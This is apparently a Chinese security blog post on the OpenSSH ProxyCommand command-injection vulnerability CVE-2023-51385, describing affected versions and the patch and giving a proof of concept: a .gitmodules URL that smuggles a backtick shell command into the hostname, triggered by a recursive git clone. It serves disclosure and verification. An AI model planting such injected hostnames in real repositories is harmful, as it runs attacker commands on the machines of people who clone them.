OpenSSH ProxyCommand命令注入漏洞(CVE-2023-51385)附验证方法

最新推荐文章于 2024-09-09 15:28:04 发布
最新推荐文章于 2024-09-09 15:28:04 发布
阅读量886 收藏 5
点赞数 8
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Elliot1314/article/details/135920198
版权
新华三盾山实验室报告了一个OpenSSH的安全漏洞(CVE-2023-51385),允许攻击者通过ProxyCommand注入恶意Shell字符进行命令注入。官方已发布补丁,建议受影响的用户及时升级到最新安全版本。
摘要由CSDN通过智能技术生成

漏洞背景:OpenSSH 是 SSH (Secure SHell) 协议的免费开源实现。SSH协议族可以用来进行远程控制, 或在计算机之间传送文件。而实现此功能的传统方式,如telnet(终端仿真协议)、 rcp ftp、 rlogin、rsh都是极为不安全的,并且会使用明文传送密码。OpenSSH提供了服务端后台程序和客户端工具,用来加密远程控制和文件传输过程中的数据,并由此来代替原来的类似服务。近日,新华三盾山实验室监测到OpenSSH官方发布了安全公告,修复了一个存在于OpenSSH中的命令注入漏洞(CVE-2023-51385),攻击者可利用该漏洞注入恶意Shell字符导致命令注入。

漏洞详情:此漏洞是由于OpenSSH中的ProxyCommand命令未对%h、%p或类似的扩展标记进行正确的过滤,攻击者可通过这些值注入恶意shell字符进行命令注入攻击。

影响范围:OpenSSH<9.6

官方补丁:目前官方已修复该漏洞,受影响用户可以升级更新到安全版本。官方下载链接:https://www.openssh.com/openbsd.html

CVE-2023-51385  验证方法:

首先需要在~/.ssh/config增加如下

host *.example.com  ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p

.gitmodules文件语句中存在命令注入

url = ssh://`echo helloworld > cve.txt`foo.example.com/bar

配置完成后,执行下面的指令触发

git clone https://github.com/zls1793/CVE-2023-51385_test --recurse-submodules

如果成功执行将会在CVE-2023-51385_test目录下生成cve.txt文件

图片

详细信息见这篇博客:

https://vin01.github.io/piptagole/ssh/security/openssh/libssh/remote-code-execution/2023/12/20/openssh-proxycommand-libssh-rce.html

白帽子Elliot
关注
漏洞复现】OpenSSH ProxyCommand命令注入漏洞CVE-2023-51385
做自己喜欢的事,并将其发挥到极致!
12-27 5413
OpenSSH 是 SSH(Secure SHell)协议的免费开源实现。SSH协议族可以用来进行远程控制, 或在计算机之间传送文件。而实现此功能的传统方式,如telnet(终端仿真协议)、 rcp ftp、 rlogin、rsh都是极为不安全的,并且会使用明文传送密码。OpenSSH提供了服务端后台程序和客户端工具,用来加密远程控制和文件传输过程中的数据,并由此来代替原来的类似服务。一个存在于OpenSSH中的命令注入漏洞,攻击者可利用该漏洞注入恶意Shell字符导致命令注入
CentOS 7.5上升级OpenSSH到9.8版本
08-23
在CentOS 7.5上升级OpenSSH到9.8版本是一个涉及多个步骤的过程,需要谨慎操作以确保系统的稳定性和安全性。以下是一个详细的升级步骤指南: 一、升级前准备 备份重要文件: 备份/etc/ssh目录,包含所有SSH配置文件。 备份/usr/bin/openssl(如果计划升级OpenSSL)。 备份/etc/pam.d/sshd(PAM认证配置文件)。 备份/usr/lib/systemd/system(如果系统使用systemd管理sshd服务)。 bash cp -rf /etc/ssh /etc/ssh.bak cp -rf /usr/bin/openssl /usr/bin/openssl.bak cp -rf /etc/pam.d/sshd /etc/pam.d/sshd.bak cp -rf /usr/lib/systemd/system /usr/lib/systemd/system.bak 更换YUM源(可选,但推荐): 更换为阿里、华为云等国内镜像源,以加快下载速度。 安装编译依赖: 安装必要的编译工具和库文件。 bash yum instal
OpenSSH漏洞CVE-2023-51385可能允许远程执
极道Jdon的技术博客
12-26 2011
被跟踪为CVE-2023-51385漏洞源于在 OpenSSH 中使用 ProxyCommandProxyJump 功能时在某些情况下对用户提供的输入验证不足。如果成功利用,该缺陷可能会被用来绕过身份验证并获得对运行易受攻击的 OpenSSH 版本的系统的未经授权的远程访问。,所有受影响的用户应紧急更新到最新的 OpenSSH 版本 9.6p1,其中包含此缺陷的修复程序。用户还应该谨慎对待来自不受信任来源的主机名。这表明该漏洞是真实存在的,远程攻击者在适当的情况下是可以利用的。
openssh 命令注入CVE-2020-15778)
最新发布
weixin_68177269的博客
09-09 446
协议进行远程登录的一个开源实现。通过对交互的流量进行加密防止窃听,连接劫持以及其他攻击。远程功能中注入命令,攻击者可利用该漏洞执行任意命令。样式的许可证提供,且已被集成到许多商业产品中。,只能进行文件上传和下载。这个条件比较苛刻,需要用户自己打开后门。项目的一些开发人员开发,首先在本地编写好反联后门。意思是复制当前目录下的。
CVE-2023-51385 OpenSSH ProxyCommand命令注入漏洞
mirocky的博客
01-09 3457
ssh_config文件中的ProxyCommand、LocalCommand指令或"match exec"谓词通过%u、%h或类似的扩展标记引用用户或主机名时,可能会导致命令注入的风险。在Git中,用户或主机名中的shell元字符未被禁止(如在主机名中进行命令拼接),这可能导致存储库包含一个带有shell元字符的子模块用户或主机名。这种情况可能引发命令注入漏洞
OpenSSH 安全漏洞(CVE-2023-51385) 升级v9.7
qq_44534541的博客
04-09 1766
漏洞编号:OpenSSH 安全漏洞(CVE-2023-51385)
【Linux】OpenSSH 命令注入漏洞(CVE-2020-15778)(iptables屏蔽22端口方式)
实施工程师从入门到放弃
11-29 2417
操作过程中要边操作边验证,切记不要关闭已打开的窗口,保持开启,即使操作错误了,这个窗口也不会自动断开,还可以自行修复,否则就无法连接,直接找人吧。这就没辙了,只能限制服务器端口访问了,但是服务器不是我方管的,只能审慎执行命令,不然登不上去了还得找别人给帮忙处理。这个命令就是删除iptables -L列出的命令,后面数字为L列出来的顺序,建议从下往上删,绿盟扫出来的漏洞,但是禁用scp漏洞复扫还是有这个漏洞,查询版本SSH版本也是没问题的。验证1022端口是否可连接,可以的话回到上一步。
[ 漏洞复现篇 ] OpenSSH 命令注入漏洞 (CVE-2020-15778)
qq_51577576的博客
08-05 2541
Linux scp 命令用于 Linux 之间复制文件和目录。scp 是 secure copy 的缩写, scp 是 linux 系统下基于 ssh 登陆进行安全的远程文件拷贝命令。scp 是加密的,rcp 是不加密的,scp 是 rcp 的加强版。该漏洞虽然利用很简单,但漏洞危害很大,漏洞等级也属于严重。利用需要知道ssh密码,在测试过程中通常可以配合ssh弱口令一起使用,或者在得知ssh密码的情况下进行使用,这样就可进行反弹shell获取权限了。...
OpenSSH命令注入漏洞(CVE-2020-15778)
热门推荐
qq_42947816的博客
02-09 2万+
一般在特定环境下利用,比如在知道SSH账户密码后,但禁用SSH登陆或SSH连接被阻止,服务器允许使用scp传文件的情况下,可对其进行命令注入,所以如果攻击者不知道ssh账密,此漏洞无法利用。
OpenSSH(CVE-2023-38408)一键升级修复-OpenSSH9.5p1
10-17
2023年,OpenSSH发现了一个名为CVE-2023-38408的安全漏洞,这个漏洞可能允许攻击者在特定条件下绕过身份验证或执行未授权的操作,对系统安全构成威胁。为了保护您的系统不受此漏洞影响,及时升级到OpenSSH 9.5p1...
SSH笔记-通过@Autowired配置注入关系
06-10
SSH笔记-通过@Autowired配置注入关系的demo,续上一篇文章中的annotation笔记
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
tar xzf openssh-8.4p1.tar.gz cd openssh-8.4p1 ./configure make sudo make install ``` 4. 更新sshd配置文件(通常位于/etc/ssh/sshd_config),根据需求进行必要的调整,并确保安全性设置正确。 5. 重启...
CentOS 7 升级OpenSSH 9.6p1解决安全漏洞CVE-2023-51384、CVE-2023-51385
weixin_45371131的博客
02-27 1634
openssh9.6P1,
OpenSSH 安全漏洞(CVE-2023-51385) 升级v9,不可思议
04-18 1060
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
OpenSSH升级8.7版本。OpenSSH 命令注入漏洞
看着博客敲代码
09-02 1244
OpenSSH升级8.7版本rpm包 OpenSSH 8.7于 2021 年 8 月 20 日发布 一定要备份配置文件 cp -r /etc/ssh/ /etc/ssh.bak/ cp -r /etc/pam.d/ /etc/pam.d.bak/ 源码包下载地址: http://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-8.7p1.tar.gz 源码安装步骤(步骤内容为8.4版本,只需要把8.4改为8.7即可) https://blog.cs
OpenSSH 命令注入漏洞(CVE-2024-15778)修复教程_openssh_8
芯_v_648374雨馨博客
04-18 828
2021年来,云主机进行了漏洞扫描,出现了大量openssh漏洞,我尝试升级过8.4、8.5的版本。16、mysql的innodb如何定位锁问题,mysql如何减少主从复制延迟?2、在工作中,运维人员经常需要跟运营人员打交道,请问运营人员是做什么工作的?6、Squid、Varinsh和Nginx有什么区别,工作中你怎么选择?5、LVS、Nginx、HAproxy有什么区别?9、讲述一下Tomcat8005、8009、8080三个端口的含义?7、Tomcat和Resin有什么区别,工作中你怎么选择?
CVE-2020-15778 OpenSSH命令注入漏洞
yyj1781572的博客
04-05 3225
scp是secure copy的缩写。在linux系统中,scp用于linux之间复制文件和目录,基于ssh登陆进行安全的远程文件拷贝命令。该命令openssh的scp.c及其他相关代码实现,通过这次实验你将了解到通过scp进行反弹shell的操作。
openssh 命令注入漏洞(cve-2020-15778)
05-26
您好,关于openssh命令注入漏洞(cve-2020-15778),这是一个影响OpenSSH版本7.2到7.9p1的漏洞,攻击者可以利用该漏洞在受害系统上执行任意命令。建议用户及时升级OpenSSH版本到7.9p1或更新版本,并且在防火墙等安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值